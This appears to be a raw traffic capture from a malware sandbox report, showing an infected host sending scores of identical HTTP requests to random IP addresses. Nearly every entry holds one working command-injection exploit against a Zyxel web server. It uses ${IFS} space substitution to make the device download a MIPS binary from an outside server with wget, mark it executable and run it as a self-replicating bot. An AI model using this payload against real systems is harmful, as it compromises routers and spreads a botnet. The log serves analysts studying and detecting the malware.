                                      Jan 19, 2024 17:29:33.796667099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4739192.168.2.1450524177.165.88.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796725988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4740192.168.2.145884263.97.75.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796753883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4741192.168.2.14562701.233.130.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796780109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4742192.168.2.144217280.166.104.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796809912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4743192.168.2.1445060199.173.52.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796880007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4744192.168.2.1458862108.152.123.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796902895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4745192.168.2.1442772144.189.240.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796961069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4746192.168.2.144555490.182.248.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797018051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4747192.168.2.1433764130.28.44.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797059059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4748192.168.2.145840890.217.11.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797080040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4749192.168.2.145881672.195.47.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797131062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4750192.168.2.1441980222.78.84.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797177076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4751192.168.2.1433406119.238.103.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797198057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4752192.168.2.1444872119.110.174.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797238111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4753192.168.2.143706470.190.59.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797261000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4754192.168.2.1443352193.19.35.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797295094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4755192.168.2.144501295.180.1.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797338963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4756192.168.2.1436442111.130.117.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797395945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4757192.168.2.1445780117.86.51.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797432899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4758192.168.2.144906675.110.118.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797458887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4759192.168.2.1446026188.163.28.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797516108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4760192.168.2.145911695.110.202.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797540903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4761192.168.2.1433318212.153.64.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797575951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4762192.168.2.144566412.148.240.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797622919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4763192.168.2.144790098.236.94.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797657013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4764192.168.2.143607680.73.104.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797714949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4765192.168.2.144241448.127.63.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797771931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4766192.168.2.1451566170.139.215.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797779083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4767192.168.2.1457584187.174.243.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797823906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4768192.168.2.144706052.236.192.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797868967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4769192.168.2.1455480220.177.96.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797899008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4770192.168.2.144138623.165.13.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797924042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4771192.168.2.144316096.236.233.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797982931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4772192.168.2.143917486.167.37.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.797996998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4773192.168.2.1440870100.47.248.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798053980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4774192.168.2.1445032154.22.87.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798091888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4775192.168.2.143650095.174.134.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798111916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4776192.168.2.144223449.111.253.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798162937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4777192.168.2.145088460.61.206.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798209906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4778192.168.2.143977864.114.135.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798240900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4779192.168.2.1442676163.70.109.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798276901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4780192.168.2.143566620.231.78.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798331976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4781192.168.2.1436854101.21.35.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798374891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4782192.168.2.1451864217.24.69.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798404932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4783192.168.2.145967658.79.45.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798470974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4784192.168.2.1446856222.178.8.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798486948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4785192.168.2.1433390187.79.109.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798521042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4786192.168.2.1445452122.189.115.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798603058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4787192.168.2.144562440.96.189.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798629045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4788192.168.2.1457698143.216.157.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798695087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4789192.168.2.145677279.16.249.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798698902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4790192.168.2.14476642.167.2.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798749924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4791192.168.2.1460074172.197.176.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798787117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4792192.168.2.1452328181.13.141.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798815012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4793192.168.2.143519618.7.251.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798871994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4794192.168.2.14367381.1.203.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798893929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4795192.168.2.1441272203.144.30.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.798944950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4796192.168.2.145757847.3.97.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799004078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4797192.168.2.145946853.174.213.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799019098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4798192.168.2.144643862.213.4.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799073935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4799192.168.2.144405444.201.27.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799108982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4800192.168.2.145979892.248.250.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799138069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4801192.168.2.144587647.80.18.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799201965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4802192.168.2.144136850.156.129.69443
                                      TimestampBytes transferredDirectionData
